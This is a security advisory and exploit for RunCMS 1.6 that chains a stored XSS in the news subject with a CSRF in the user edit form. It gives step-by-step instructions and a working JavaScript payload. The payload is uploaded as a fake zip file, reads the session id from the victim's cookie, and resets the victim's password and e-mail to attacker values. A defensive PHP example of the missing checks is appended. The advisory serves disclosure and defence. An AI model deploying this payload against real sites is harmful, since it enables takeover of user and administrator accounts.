

[4] RunCMS 1.6 Stored XSS Injection and XSRF Exploit Change Password



#/********************************************************************/
#/* RUNCMS 1.6 Stored XSS Injection and XSRF Exploit Change Password */
#/********************************************************************/
#/* Exploit gets the user id from the cookie and then changes the    */
#/* user's password and e-mail as needed                             */
#/********************************************************************/
#/* Tested on RUNCMS English version 1.6                             */
#/********************************************************************/
#/* Note: for educational purpose only                               */
#/********************************************************************/
#/* Date of Public EXPLOIT: December 27, 2007                        */
#/* Written by: Stas "CTac" Svistunovich                             */
#/* from [Digital Security Research Group]                           */
#/* research [at] dsec [dot] ru                                      */
#/*                                                                  */
#/* Original Advisory: http://www.securityfocus.com/archive/1/485512 */
#/********************************************************************/
#
#
# Details
#*********************************************************************
#
# 1. A stored XSS vulnerability was found in the script modules/news/submit.php
# in the POST parameter named "subject".
#
# Example:
#
# POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
#
#
# subject=<script>alert("DSecRG XSS")</script>
#
#
# The "subject" parameter is limited to 60 characters.
#
#
# 2. RUNCMS is prone to a cross-site request-forgery vulnerability.
#
# Exploiting this issue may allow a remote attacker to change the web
# administrator's password.
#
#
#
# Fix Information
#*********************************************************************
#
# RunCMS was altered to fix this flaw on Dec 15, 2007. Updated
# version (1.6.1) can be downloaded here:
#
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131
#
#
#
# About
#*********************************************************************
#
# Digital Security is a leading IT security company in Russia,
# providing information security consulting, audit and penetration
# testing services, risk analysis and ISMS-related services and
# certification for ISO/IEC 27001:2005 and PCI DSS standards.
# Digital Security Research Group focuses on web application and
# database security problems with vulnerability reports,
# advisories and whitepapers posted regularly on our website.
#
#
# Contact: research [at] dsec [dot] ru
# http://www.dsec.ru (in Russian)
#
#############################################################

To exploit this vulnerability, an attacker must:


1. Register on the site.


2. Because a news subject cannot be longer than 60 characters, the attacker
needs to upload the JavaScript to the server using the submit form:

http://[server]/[installdir]/modules/mydownloads/submit.php

For example, the attacker can upload a file named test.zip (the file name
including its extension must be shorter than 9 characters) containing the code:

var objHTTP = new ActiveXObject('MSXML2.XMLHTTP');
var id = document.cookie.substr(document.cookie.search("rc_sess") + 31);
objHTTP.open('POST',"http://[server]/[installdir]/edituser.php",false);
objHTTP.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
objHTTP.send("email=pwned%40attacker.com&upass=12345&vpass=12345&usecookie=0&uid=" + id + "&op=saveuser");


3. By default the file will be uploaded to
http://[server]/[installdir]/modules/mydownloads/cache/files/test.zip


4. Now the attacker needs to submit a news item with subject = <script src="../mydownloads/cache/files/test.zip">
on the page http://[server]/[installdir]/modules/news/submit.php


5. When a legitimate user or the admin opens the news page, their password and
e-mail will be changed automatically to the attacker's.
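
As an added defensive illustration (not RunCMS code and not part of the original advisory), the following PHP shows the server-side checks whose absence the steps above depend on: a per-session anti-CSRF token on the profile form, refusing a client-supplied uid that differs from the session's user, re-authentication before a password or e-mail change, and HTML-escaping the news subject on output. Function names and session keys are hypothetical.

```php
<?php
// Added example, not RunCMS code; function names and session keys are hypothetical.
declare(strict_types=1);

// Per-session anti-CSRF token, to be embedded as a hidden field in the profile form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison: a cross-site POST cannot know the token, so it fails here.
function csrf_valid(array $session, $submitted): bool {
    return is_string($submitted)
        && isset($session['csrf_token'])
        && hash_equals($session['csrf_token'], $submitted);
}

// Returns null when a password/e-mail change may proceed, otherwise an error string.
function validate_profile_change(array $post, array $session, string $currentHash): ?string {
    if (!csrf_valid($session, $post['token'] ?? null)) {
        return 'missing or bad CSRF token';
    }
    // The target row is always the logged-in user; never let the request pick another uid.
    if ((int)($post['uid'] ?? 0) !== (int)($session['uid'] ?? -1)) {
        return 'uid does not match the logged-in user';
    }
    // Re-authenticate: a forged request cannot supply the victim's current password.
    if (!password_verify((string)($post['oldpass'] ?? ''), $currentHash)) {
        return 'current password is wrong';
    }
    if (($post['upass'] ?? '') === '' || ($post['upass'] ?? '') !== ($post['vpass'] ?? '')) {
        return 'new passwords are empty or do not match';
    }
    if (filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL) === false) {
        return 'invalid e-mail address';
    }
    return null;
}

// Stored XSS fix for the 60-character subject: escape on output so a value such as
// <script src="../mydownloads/cache/files/test.zip"> is rendered as text, not executed.
function render_subject(string $subject): string {
    return htmlspecialchars($subject, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

Serving user uploads from a web-accessible cache directory is the remaining weak point; sending X-Content-Type-Options: nosniff on such responses stops modern browsers from executing a non-JavaScript file referenced by a script tag.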
